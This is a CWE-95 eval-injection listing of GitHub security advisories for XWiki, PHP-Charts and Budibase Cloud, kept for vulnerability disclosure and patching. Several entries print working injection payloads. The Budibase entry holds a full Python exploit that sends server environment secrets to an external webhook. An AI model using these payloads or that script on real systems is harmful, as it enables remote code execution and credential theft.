CWE-95
AllowedImproper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval").
261 vulnerabilities reference this CWE, most recent first.
GHSA-QX9H-C5V6-GHQH
Vulnerability from github – Published: 2023-04-12 20:35 – Updated: 2023-04-26 20:33Impact
Any user with edit rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the included pages in the IncludedDocuments panel.
Precondition: As an admin, add the Panels.IncludedDocuments panel on one column.
A proof of concept exploit is to edit a document and add the following code before saving.
{{display reference="{{cache~}~}{{groovy~}~}println(~"Hello from Groovy~" + ~" in included document!~"){{/groovy~}~}{{/cache~}~}"/}}
expected The right had side panels contain:
One included page:
{{cache}}{{groovy}}println("Hello from Groovy" + " in included document!"){{/groovy}}{{/cache}}
actual The right had side panels contain:
One included page:
XWiki.Hello from Groovy in included document!
Patches
The problem has been patched on XWiki 14.4.7, and 14.10.
Workarounds
The issue can be fixed manually applying this patch.
References
- https://github.com/xwiki/xwiki-platform/commit/50b4d91418b4150933f0317eb4a94ceaf5b69f67
- https://jira.xwiki.org/browse/XWIKI-20306
For more information
If you have any questions or comments about this advisory:
- Open an issue in Jira XWiki.org
- Email us at Security Mailing List
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-panels-ui"
},
"ranges": [
{
"events": [
{
"introduced": "1.1-M2"
},
{
"fixed": "13.10.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-panels-ui"
},
"ranges": [
{
"events": [
{
"introduced": "14.0-rc-1"
},
{
"fixed": "14.4.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-panels-ui"
},
"ranges": [
{
"events": [
{
"introduced": "14.5"
},
{
"fixed": "14.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-29214"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2023-04-12T20:35:50Z",
"nvd_published_at": "2023-04-16T07:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\nAny user with edit rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the included pages in the IncludedDocuments panel.\n\n**Precondition**: As an admin, add the `Panels.IncludedDocuments` panel on one column.\n\nA proof of concept exploit is to edit a document and add the following code before saving.\n\n```\n{{display reference=\"{{cache~}~}{{groovy~}~}println(~\"Hello from Groovy~\" + ~\" in included document!~\"){{/groovy~}~}{{/cache~}~}\"/}}\n```\n\n**expected**\nThe right had side panels contain:\n```\nOne included page: \n{{cache}}{{groovy}}println(\"Hello from Groovy\" + \" in included document!\"){{/groovy}}{{/cache}}\n```\n\n**actual**\nThe right had side panels contain:\n```\nOne included page:\n XWiki.Hello from Groovy in included document!\n```\n\n### Patches\nThe problem has been patched on XWiki 14.4.7, and 14.10.\n\n### Workarounds\nThe issue can be fixed manually applying this [patch](https://github.com/xwiki/xwiki-platform/commit/50b4d91418b4150933f0317eb4a94ceaf5b69f67).\n\n### References\n- https://github.com/xwiki/xwiki-platform/commit/50b4d91418b4150933f0317eb4a94ceaf5b69f67\n- https://jira.xwiki.org/browse/XWIKI-20306\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n",
"id": "GHSA-qx9h-c5v6-ghqh",
"modified": "2023-04-26T20:33:30Z",
"published": "2023-04-12T20:35:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qx9h-c5v6-ghqh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29214"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/50b4d91418b4150933f0317eb4a94ceaf5b69f67"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20306"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "org.xwiki.platform:xwiki-platform-panels-ui Eval Injection vulnerability"
}
GHSA-RF8J-Q39G-7XFM
Vulnerability from github – Published: 2023-06-20 16:46 – Updated: 2023-06-20 16:46Impact
Any logged in user can add dangerous content in their first name field and see it executed with programming rights. Leading to rights escalation.
Patches
The vulnerability has been fixed on XWiki 14.4.8, 14.10.6, and 15.1.
Workarounds
The vulnerability can be fixed by applying this patch.
On versions before 13.4-rc-1, the fix needs to be applied on XWiki.Like.Code.LiveTableResultPage.
References
- The reported issue https://jira.xwiki.org/browse/XWIKI-20611, fixed by https://jira.xwiki.org/browse/XWIKI-19900
- The patch https://github.com/xwiki/xwiki-platform/commit/6ce2d04a5779e07f6d3ed3f37d4761049b4fc3ac#diff-ef7f8b911bb8e584fda22aac5876a329add35ca0d1d32e0fdb62a439b78cfa49
For more information
If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-like-ui"
},
"ranges": [
{
"events": [
{
"introduced": "12.9-rc-1"
},
{
"fixed": "14.4.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-like-ui"
},
"ranges": [
{
"events": [
{
"introduced": "14.5"
},
{
"fixed": "14.10.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-like-ui"
},
"ranges": [
{
"events": [
{
"introduced": "15.0-rc-1"
},
{
"fixed": "15.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-35152"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-20T16:46:53Z",
"nvd_published_at": "2023-06-23T17:15:09Z",
"severity": "CRITICAL"
},
"details": "### Impact\nAny logged in user can add dangerous content in their first name field and see it executed with programming rights. Leading to rights escalation.\n\n### Patches\nThe vulnerability has been fixed on XWiki 14.4.8, 14.10.6, and 15.1.\n\n### Workarounds\nThe vulnerability can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/6ce2d04a5779e07f6d3ed3f37d4761049b4fc3ac#diff-ef7f8b911bb8e584fda22aac5876a329add35ca0d1d32e0fdb62a439b78cfa49).\n\nOn versions before 13.4-rc-1, the fix needs to be applied on [XWiki.Like.Code.LiveTableResultPage](https://github.com/xwiki/xwiki-platform/commit/0993a7ab3c102f9ac37ffe361a83a3dc302c0e45#diff-0b51114cb27f7a5c599cf40c59d658eae6ddc5c0836532c3b35e163f40a4854fR39).\n\n### References\n- The reported issue https://jira.xwiki.org/browse/XWIKI-20611, fixed by https://jira.xwiki.org/browse/XWIKI-19900\n- The patch https://github.com/xwiki/xwiki-platform/commit/6ce2d04a5779e07f6d3ed3f37d4761049b4fc3ac#diff-ef7f8b911bb8e584fda22aac5876a329add35ca0d1d32e0fdb62a439b78cfa49\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n",
"id": "GHSA-rf8j-q39g-7xfm",
"modified": "2023-06-20T16:46:53Z",
"published": "2023-06-20T16:46:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rf8j-q39g-7xfm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35152"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/0993a7ab3c102f9ac37ffe361a83a3dc302c0e45#diff-0b51114cb27f7a5c599cf40c59d658eae6ddc5c0836532c3b35e163f40a4854fR39"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/6ce2d04a5779e07f6d3ed3f37d4761049b4fc3ac#diff-ef7f8b911bb8e584fda22aac5876a329add35ca0d1d32e0fdb62a439b78cfa49"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-19900"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20611"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "XWiki Platform vulnerable to privilege escalation (PR) from account through like LiveTableResults"
}
GHSA-RFH6-MG6H-H668
Vulnerability from github – Published: 2023-04-12 20:36 – Updated: 2023-04-26 22:15Impact
Any user with edit rights on a page (e.g., it's own user page), can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the section ids in XWiki.AdminFieldsDisplaySheet. This page is installed by default.
Reproduction steps are described in https://jira.xwiki.org/browse/XWIKI-20261
Patches
The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11.
Workarounds
The issue can be fixed by applying this patch on XWiki.AdminFieldsDisplaySheet.
For more information
If you have any questions or comments about this advisory:
- Open an issue in Jira XWiki.org
- Email us at Security Mailing List
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-administration-ui"
},
"ranges": [
{
"events": [
{
"introduced": "1.5M2"
},
{
"fixed": "13.10.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-administration-ui"
},
"ranges": [
{
"events": [
{
"introduced": "14.0-rc-1"
},
{
"fixed": "14.4.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-administration-ui"
},
"ranges": [
{
"events": [
{
"introduced": "14.5"
},
{
"fixed": "14.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-29511"
],
"database_specific": {
"cwe_ids": [
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2023-04-12T20:36:56Z",
"nvd_published_at": "2023-04-16T08:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\nAny user with edit rights on a page (e.g., it\u0027s own user page), can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the section ids in `XWiki.AdminFieldsDisplaySheet`. This page is installed by default.\n\nReproduction steps are described in https://jira.xwiki.org/browse/XWIKI-20261\n\n### Patches\nThe vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11.\n\n### Workarounds\nThe issue can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/f1e310826a19acdcdecdecdcfe171d21f24d6ede) on `XWiki.AdminFieldsDisplaySheet`.\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n",
"id": "GHSA-rfh6-mg6h-h668",
"modified": "2023-04-26T22:15:50Z",
"published": "2023-04-12T20:36:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rfh6-mg6h-h668"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29511"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/f1e310826a19acdcdecdecdcfe171d21f24d6ede"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20261"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "xwiki-platform-administration-ui vulnerable to privilege escalation"
}
GHSA-RJ7P-XJV7-7229
Vulnerability from github – Published: 2024-01-08 16:33 – Updated: 2024-01-08 18:36Impact
XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests.
To reproduce, register with any username and password and the following payload as "first name": ]]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack succeeded){{/groovy}}{{/async}}. In the following page that confirms the success of the registration, the full first name should be displayed, linking to the created user. If the formatting is broken and a log message with content "ERROR attacker - Attack succeeded!" is logged, the attack succeeded.
Patches
This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1.
Workarounds
In the administration of your wiki, under "Users & Rights" > "Registration" set the "Registration Successful Message" to the following code:
#set($message = $services.localization.render('core.register.successful', 'xwiki/2.1', ['USERLINK', $userName]))
#set($userLink = $xwiki.getUserName("$userSpace$userName"))
{{info}}$message.replace('USERLINK', "{{html clean=false}}$userLink{{/html}}"){{/info}}
References
- https://jira.xwiki.org/browse/XWIKI-21173
- https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-administration-ui"
},
"ranges": [
{
"events": [
{
"introduced": "2.2"
},
{
"fixed": "14.10.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-administration-ui"
},
"ranges": [
{
"events": [
{
"introduced": "15.0-rc-1"
},
{
"fixed": "15.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-administration-ui"
},
"ranges": [
{
"events": [
{
"introduced": "15.6-rc-1"
},
{
"fixed": "15.8-rc-1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-21650"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-08T16:33:14Z",
"nvd_published_at": "2024-01-08T16:15:46Z",
"severity": "CRITICAL"
},
"details": "### Impact\nXWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the \"first name\" or \"last name\" fields during user registration. This impacts all installations that have user registration enabled for guests.\n\nTo reproduce, register with any username and password and the following payload as \"first name\": `]]{{/html}}{{async}}{{groovy}}services.logging.getLogger(\"attacker\").error(\"Attack succeeded){{/groovy}}{{/async}}`. In the following page that confirms the success of the registration, the full first name should be displayed, linking to the created user. If the formatting is broken and a log message with content \"ERROR attacker - Attack succeeded!\" is logged, the attack succeeded.\n\n### Patches\nThis vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1.\n\n### Workarounds\n\nIn the administration of your wiki, under \"Users \u0026 Rights\" \u003e \"Registration\" set the \"Registration Successful Message\" to the following code:\n\n```velocity\n#set($message = $services.localization.render(\u0027core.register.successful\u0027, \u0027xwiki/2.1\u0027, [\u0027USERLINK\u0027, $userName]))\n#set($userLink = $xwiki.getUserName(\"$userSpace$userName\"))\n{{info}}$message.replace(\u0027USERLINK\u0027, \"{{html clean=false}}$userLink{{/html}}\"){{/info}}\n```\n\n### References\n* https://jira.xwiki.org/browse/XWIKI-21173\n* https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31",
"id": "GHSA-rj7p-xjv7-7229",
"modified": "2024-01-08T18:36:59Z",
"published": "2024-01-08T16:33:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rj7p-xjv7-7229"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21650"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/cdf5be8c20b6b6fe6b9b56a6557561007859655f"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/ec608f303913f5e8af061f2a98506f49d69be60f"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-21173"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "XWiki Remote Code Execution Vulnerability via User Registration"
}
GHSA-RR6P-3PFG-562J
Vulnerability from github – Published: 2025-02-20 20:16 – Updated: 2025-10-30 19:54Impact
Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity and availability of the whole XWiki installation.
To reproduce on an instance, without being logged in, go to <host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20. If there is an output, and the title of the RSS feed contains Hello from search text:42, then the instance is vulnerable.
Patches
This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1.
Workarounds
This line in Main.SolrSearchMacros can be edited to match the rawResponse macro defined here with a content type of application/xml, instead of simply outputting the content of the feed.
References
- https://jira.xwiki.org/browse/XWIKI-22149
- https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40
Attribution
This vulnerability has been reported by John Kwak for Trend Micro's Zero Day Initiative.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-search-solr-ui"
},
"ranges": [
{
"events": [
{
"introduced": "5.3-milestone-2"
},
{
"fixed": "15.10.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-search-solr-ui"
},
"ranges": [
{
"events": [
{
"introduced": "16.0.0-rc-1"
},
{
"fixed": "16.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-24893"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-20T20:16:21Z",
"nvd_published_at": "2025-02-20T20:15:46Z",
"severity": "CRITICAL"
},
"details": "### Impact\nAny guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation.\n\nTo reproduce on an instance, without being logged in, go to `\u003chost\u003e/xwiki/bin/get/Main/SolrSearch?media=rss\u0026text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28\"Hello%20from\"%20%2B%20\"%20search%20text%3A\"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable.\n\n### Patches\nThis vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1.\n\n### Workarounds\n[This line](https://github.com/xwiki/xwiki-platform/blob/568447cad5172d97d6bbcfda9f6183689c2cf086/xwiki-platform-core/xwiki-platform-search/xwiki-platform-search-solr/xwiki-platform-search-solr-ui/src/main/resources/Main/SolrSearchMacros.xml#L955) in `Main.SolrSearchMacros` can be edited to match the `rawResponse` macro defined [here](https://github.com/xwiki/xwiki-platform/blob/67021db9b8ed26c2236a653269302a86bf01ef40/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-templates/src/main/resources/templates/macros.vm#L2824) with a content type of `application/xml`, instead of simply outputting the content of the feed.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-22149\n* https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40\n\n### Attribution\nThis vulnerability has been reported by John Kwak for Trend Micro\u0027s Zero Day Initiative.",
"id": "GHSA-rr6p-3pfg-562j",
"modified": "2025-10-30T19:54:04Z",
"published": "2025-02-20T20:16:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24893"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/blob/568447cad5172d97d6bbcfda9f6183689c2cf086/xwiki-platform-core/xwiki-platform-search/xwiki-platform-search-solr/xwiki-platform-search-solr-ui/src/main/resources/Main/SolrSearchMacros.xml#L955"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/blob/67021db9b8ed26c2236a653269302a86bf01ef40/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-templates/src/main/resources/templates/macros.vm#L2824"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-22149"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24893"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "XWiki Platform allows remote code execution as guest via SolrSearchMacros request"
}
GHSA-RRMX-33QP-WV5M
Vulnerability from github – Published: 2025-08-05 21:31 – Updated: 2025-08-05 21:31PHP-Charts v1.0 contains a PHP code execution vulnerability in wizard/url.php, where user-supplied GET parameter names are passed directly to eval() without sanitization. A remote attacker can exploit this flaw by crafting a request that injects arbitrary PHP code, resulting in command execution under the web server's context. The vulnerability allows unauthenticated attackers to execute system-level commands via base64-encoded payloads embedded in parameter names, leading to full compromise of the host system.
{
"affected": [],
"aliases": [
"CVE-2013-10070"
],
"database_specific": {
"cwe_ids": [
"CWE-95"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-05T20:15:35Z",
"severity": "CRITICAL"
},
"details": "PHP-Charts v1.0 contains a PHP code execution vulnerability in wizard/url.php, where user-supplied GET parameter names are passed directly to eval() without sanitization. A remote attacker can exploit this flaw by crafting a request that injects arbitrary PHP code, resulting in command execution under the web server\u0027s context. The vulnerability allows unauthenticated attackers to execute system-level commands via base64-encoded payloads embedded in parameter names, leading to full compromise of the host system.",
"id": "GHSA-rrmx-33qp-wv5m",
"modified": "2025-08-05T21:31:38Z",
"published": "2025-08-05T21:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10070"
},
{
"type": "WEB",
"url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/php_charts_exec.rb"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20130120234844/http://php-charts.com"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/24201"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/24273"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/php-charts-php-code-execution"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RVHR-26G4-P2R8
Vulnerability from github – Published: 2026-02-25 18:57 – Updated: 2026-02-25 18:57Summary
A critical unsafe eval() vulnerability in Budibase's view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. This vulnerability ONLY affects Budibase Cloud (SaaS) - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in packages/server/src/db/inMemoryView.ts where user-controlled view map functions are directly evaluated without sanitization.
The primary impact comes from what lives inside the pod's environment: the app-service pod runs with secrets baked into its environment variables, including INTERNAL_API_KEY, JWT_SECRET, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable.
Details
Root Cause
File: packages/server/src/db/inMemoryView.ts:28
export async function runView(
view: DBView,
calculation: string,
group: boolean,
data: Row[]
) {
// ...
let fn = (doc: Document, emit: any) => emit(doc._id)
// BUDI-7060 -> indirect eval call appears to cause issues in cloud
eval("fn = " + view?.map?.replace("function (doc)", "function (doc, emit)")) // UNSAFE EVAL
// ...
}
Why Only Cloud is Vulnerable:
File: packages/server/src/sdk/workspace/rows/search/internal/internal.ts:194-221
if (env.SELF_HOSTED) {
// Self-hosted: Uses native CouchDB design documents - NO EVAL
response = await db.query(`database/${viewName}`, {
include_docs: !calculation,
group: !!group,
})
} else {
// Cloud: Uses in-memory PouchDB with UNSAFE EVAL
const tableId = viewInfo.meta!.tableId
const data = await fetchRaw(tableId!)
response = await inMemoryViews.runView( // <- Calls vulnerable function
viewInfo,
calculation as string,
!!group,
data
)
}
The view.map parameter comes directly from user input when creating table views with filters. The code constructs a string by concatenating "fn = " with the user-controlled map function and passes it to eval(), allowing arbitrary JavaScript execution in the Node.js server context.
Self-hosted deployments are not affected because they use native CouchDB design documents instead of the in-memory eval() path.
Attack Flow
- Authenticated user creates a table view with custom filter
- Frontend sends POST request to
/api/viewswith malicious payload in filter value - Backend stores view configuration in CouchDB
- When view is queried (GET
/api/views/{viewName}),runView()is called - Malicious code is
eval()'d on server - RCE achieved
Exploitation Vector
The vulnerability is triggered via the view filter mechanism. When creating a view with a filter condition, the filter value can be injected with JavaScript code that breaks out of the intended expression context:
Malicious filter value:
x" || (MALICIOUS_CODE_HERE, true) || "
This payload:
- Closes the expected string context with x"
- Uses || (OR operator) to inject arbitrary code
- Returns true to make the filter always match
- Closes with || "" to maintain valid syntax
Verified on Production
Tested on own Budibase Cloud account (y4ylfy7m.budibase.app,) to confirm severity. Testing was deliberately limited - no customer data was retained and exploitation was stopped once impact was confirmed:
- Achieved RCE on app-service pod (hostname: app-service-5f4f6d796d-p6dhz, Kubernetes, eu-west-1)
- Extracted process.env - confirmed presence of platform secrets (JWT_SECRET, INTERNAL_API_KEY, COUCH_DB_URL, MINIO_ACCESS_KEY, etc.)
- Used extracted COUCH_DB_URL credentials to verify CouchDB access - enumerated database list (489,827 databases) to confirm scale of impact
- Queried users table to confirm data is readable (retrieved email addresses)
- Uploaded an HTML file as a PoC artifact to confirm write access.
Proof of Concept
PoC Script
import requests, time
from urllib.parse import urlparse
# Config | CHANGE THESE
URL = "https://[YOUR-TENANT].budibase.app"
WEBHOOK = "https://webhook.site/[YOUR-WEBHOOK-ID]"
JWT = "[YOUR-JWT-TOKEN]" # budibase:auth cookie value
APP_ID = "app_dev_[TENANT]_[APP-UUID]" # x-budibase-app-id header
TABLE_ID = "[YOUR-TABLE-ID]" # any table ID (e.g. ta_users)
# Payload - parses hostname/path from WEBHOOK automatically
webhook_parsed = urlparse(WEBHOOK)
view = f"RCE_{int(time.time())}"
payload = f'''x" || (require('https').request({{hostname:'{webhook_parsed.hostname}',path:'{webhook_parsed.path}',method:'POST'}}).end(JSON.stringify(process.env)), true) || "'''
# Exploit
s = requests.Session()
s.cookies.set('budibase:auth', JWT)
s.headers.update({"x-budibase-app-id": APP_ID, "Content-Type": "application/json"})
print(f"[*] Creating view...")
s.post(f"{URL}/api/views", json={"tableId": TABLE_ID, "name": view, "filters": [{"key": "email", "condition": "EQUALS", "value": payload}]})
print(f"[*] Triggering RCE...")
s.get(f"{URL}/api/views/{view}")
print(f"[+] Done! Check: {WEBHOOK}")
Video Demo
https://github.com/user-attachments/assets/cd12e1ab-02fd-4d0d-9fb5-d78bb83cdf99
Reproduction Steps
- Prerequisites:
- Create free Budibase Cloud account at https://budibase.app
- Create a new app
-
Create a table with at least one text field
-
Exploitation:
- Copy the PoC script above
- Replace placeholders with your tenant URL, app ID, table ID
- Get your JWT token from browser cookies (
budibase:auth) - Create a webhook at https://webhook.site for exfiltration
-
Run the script:
python3 budibase_rce_poc.py -
Verification:
- Check webhook.site - you'll receive all server environment variables
- Extracted data includes JWT_SECRET, INTERNAL_API_KEY, database credentials
Additional Note
The budibase:auth session cookie has Domain=.budibase.app (leading dot = all subdomains) and no HttpOnly flag, making it readable by JavaScript. Since the RCE allows uploading arbitrary HTML files to any subdomain (as demonstrated with the PoC artifact), an attacker could serve an XSS payload from their own tenant subdomain and steal session cookies from any Budibase Cloud user who visits that page (one click ATO).
Responsible Disclosure Statement
